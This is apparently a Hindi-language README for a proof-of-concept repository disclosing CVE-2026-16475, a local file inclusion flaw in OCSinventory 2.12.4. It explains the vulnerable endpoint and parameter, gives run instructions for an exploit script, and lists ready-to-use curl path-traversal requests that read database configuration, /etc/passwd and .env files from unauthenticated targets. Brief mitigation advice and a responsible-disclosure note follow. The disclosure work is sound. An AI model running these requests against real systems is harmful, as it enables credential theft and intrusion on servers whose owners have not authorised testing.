
यह CVE-2026-16475 के PoC के साथ आधिकारिक रिपॉजिटरी है, OCSinventory 2.12.4 में LFI।
OCSinventory 2.12.4 में लोकल फ़ाइल इन्क्लूज़न भेद्यता
CVE ID: CVE-2026-16475
CVSS स्कोर: 6.9 (मध्यम)
CWE: CWE-98 (PHP प्रोग्राम में Include/Require स्टेटमेंट के लिए फ़ाइलनाम का अनुचित नियंत्रण)
प्रभावित संस्करण: OCSinventory 2.12.4
स्थिति: नवीनतम संस्करणों में पैच किया गया
/ajax/teledeployoptions.php एंडपॉइंट में लोकल फ़ाइल इन्क्लूज़न (LFI) भेद्यता मौजूद है, जो डायनामिक XML फ़ाइल इन्क्लूज़न ऑपरेशन में उपयोग से पहले linkedoptions पैरामीटर के अनुचित सैनिटाइज़ेशन के कारण होती है।
यह एंडपॉइंट XML कॉन्फ़िगरेशन फ़ाइलें लोड करने के लिए डिज़ाइन किया गया है, लेकिन यह linkedoptions पैरामीटर को ठीक से मान्य (validate) नहीं कर पाता, जिससे पाथ ट्रैवर्सल (path traversal) हमले संभव हो जाते हैं।
एक बिना प्रमाणीकरण वाला रिमोट हमलावर इस भेद्यता का दोहन कर सकता है:
pip install -r requirements.txt
python3 exploit.py -u http://target.com -v
विकल्प:
-u, --url - लक्ष्य URL (आवश्यक)-v, --verbose - विस्तृत (verbose) आउटपुट-o, --output - सफल रीड्स को फ़ाइल में सहेजेंउदाहरण:
python3 exploit.py -u http://ocs.example.com -v -o results.txt
./lfi_test.sh
स्क्रिप्ट में BASE_URL वेरिएबल संपादित करें:
BASE_URL="http://target.com/ajax/teledeployoptions.php"
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
उपयोगकर्ताओं के लिए:
डेवलपर्स के लिए:
basename() या समान फ़ंक्शन का उपयोग करेंनोट: CVE-2026-16475 का समन्वय INCIBE के माध्यम से किया गया है और हो सकता है कि यह अभी तक NVD में अनुक्रमित न हुआ हो। आधिकारिक जानकारी के लिए INCIBE स्रोत देखें।
केवल शैक्षिक और अधिकृत परीक्षण के लिए
पूर्ण कानूनी नोटिस के लिए DISCLAIMER.md देखें।
Adrián Ferrer Tarí
जिम्मेदार प्रकटीकरण INCIBE के माध्यम से समन्वित